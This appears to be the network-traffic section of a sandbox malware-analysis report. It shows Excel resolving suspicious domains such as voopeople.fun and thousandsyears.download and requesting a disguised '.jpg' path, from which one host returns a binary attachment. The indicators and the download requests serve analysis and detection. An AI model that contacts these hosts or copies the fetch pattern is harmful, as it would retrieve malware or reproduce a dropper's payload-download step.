                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.728014946 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.728039026 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.728066921 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.728091955 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.728121042 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.729195118 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.729227066 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.729257107 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.729319096 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730082035 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730110884 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730138063 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730173111 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730225086 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730729103 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730757952 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730787992 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.730808020 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.732264042 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.732295036 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.732322931 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.732348919 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.732374907 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.732527018 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.733520985 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.733551025 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.733583927 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.733609915 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.733741999 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735066891 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735096931 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735146999 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735168934 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735207081 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735229969 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.735268116 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736037970 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736881018 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736910105 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736939907 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736968994 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736985922 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.736998081 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.737026930 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.737035990 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738364935 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738398075 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738425016 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738461018 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738701105 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738728046 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738749981 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738754034 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.738784075 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.739739895 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.739768982 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.739795923 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.739881992 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.740647078 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.740677118 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.740700960 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.740752935 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.761832952 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.766259909 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.766297102 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.766330004 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.766386986 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.768294096 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.768321037 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.768430948 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.817276955 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.817322016 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.817358017 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.817512035 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818378925 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818422079 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818453074 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818499088 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818537951 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818579912 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818608046 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818675995 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.818721056 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.819236040 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.819276094 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.819305897 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.819359064 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.820242882 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.820280075 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.820307970 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.820336103 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823282957 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823317051 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823345900 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823373079 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823404074 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823426962 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823436022 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823456049 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823467016 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823489904 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823510885 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823520899 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823563099 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.823991060 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824021101 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824048042 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824060917 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824732065 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824762106 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824784994 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824786901 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.824826956 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.825294018 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.825366020 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.825392962 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.825402021 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827038050 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827075005 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827102900 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827143908 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827171087 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827198029 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827198982 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.827228069 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828794956 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828828096 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828861952 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828892946 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828907013 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828922987 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828952074 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828953028 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.828993082 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.829957962 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.829987049 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830013990 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830054998 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830755949 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830785990 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830816031 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830821037 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.830861092 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.831502914 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.831526041 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.831554890 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.831603050 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.835298061 CEST4434916813.224.92.73192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.835494995 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.979588985 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.019628048 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.019753933 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.020235062 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.062242985 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.565305948 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.565336943 CEST8049169104.21.37.209192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:57.565391064 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                Jul 6, 2021 17:23:00.474700928 CEST49168443192.168.2.2213.224.92.73
                                                                                                                                                                                                                                                Jul 6, 2021 17:23:00.474889040 CEST4916980192.168.2.22104.21.37.209
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.900580883 CEST4916780192.168.2.22104.21.55.83
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.901269913 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.901762009 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.941984892 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.942028046 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.942226887 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.942305088 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.942563057 CEST8049167104.21.55.83192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:24:53.942663908 CEST4916780192.168.2.22104.21.55.83

                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:53.986752987 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.047245979 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.194484949 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.257081985 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.427552938 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.491775990 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.495512009 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.559618950 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.582134008 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.641226053 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.852143049 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.910388947 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.918122053 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.978456020 CEST53560098.8.8.8192.168.2.22

                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:53.986752987 CEST192.168.2.228.8.8.80xd372Standard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.194484949 CEST192.168.2.228.8.8.80x7032Standard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.427552938 CEST192.168.2.228.8.8.80xad13Standard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.495512009 CEST192.168.2.228.8.8.80x4177Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.582134008 CEST192.168.2.228.8.8.80x4335Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.852143049 CEST192.168.2.228.8.8.80x45a5Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.918122053 CEST192.168.2.228.8.8.80x6e2bStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.047245979 CEST8.8.8.8192.168.2.220xd372No error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.047245979 CEST8.8.8.8192.168.2.220xd372No error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.257081985 CEST8.8.8.8192.168.2.220x7032No error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.257081985 CEST8.8.8.8192.168.2.220x7032No error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.491775990 CEST8.8.8.8192.168.2.220xad13No error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.491775990 CEST8.8.8.8192.168.2.220xad13No error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.559618950 CEST8.8.8.8192.168.2.220x4177No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.559618950 CEST8.8.8.8192.168.2.220x4177No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.559618950 CEST8.8.8.8192.168.2.220x4177No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.641226053 CEST8.8.8.8192.168.2.220x4335No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.641226053 CEST8.8.8.8192.168.2.220x4335No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:55.641226053 CEST8.8.8.8192.168.2.220x4335No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.910388947 CEST8.8.8.8192.168.2.220x45a5No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.910388947 CEST8.8.8.8192.168.2.220x45a5No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.978456020 CEST8.8.8.8192.168.2.220x6e2bNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:56.978456020 CEST8.8.8.8192.168.2.220x6e2bNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)

                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                • thousandsyears.download
                                                                                                                                                                                                                                                • voopeople.fun
                                                                                                                                                                                                                                                • uppercilio.fun
                                                                                                                                                                                                                                                • astrocycle.download

                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                0192.168.2.2249165172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.096028090 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                                Host: thousandsyears.download
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.166523933 CEST1INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:22:54 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 5183
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0lFLDt%2BU%2BA22xiG5FotnoSNcBrevRCYdThXR8zqtqkvdimpUfR2NaBFLYY4AgIP1GGYrkdnvIMvLyWZ1NHMY%2FOrTKFzWMQ5iOuNA2%2FlXbu6XAjspuE1NcgKYVSzumZ9zS5ue%2B3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 66a9d4c849344a9e-FRA
                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                                Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 14
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.166559935 CEST1INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                1192.168.2.2249166172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.298876047 CEST2OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                                Host: voopeople.fun
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Jul 6, 2021 17:22:54.351826906 CEST3INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Tue, 06 Jul 2021 15:22:54 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 57856
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 5182
                                                                                                                                                                                                                                                Accept-Ranges: bytes
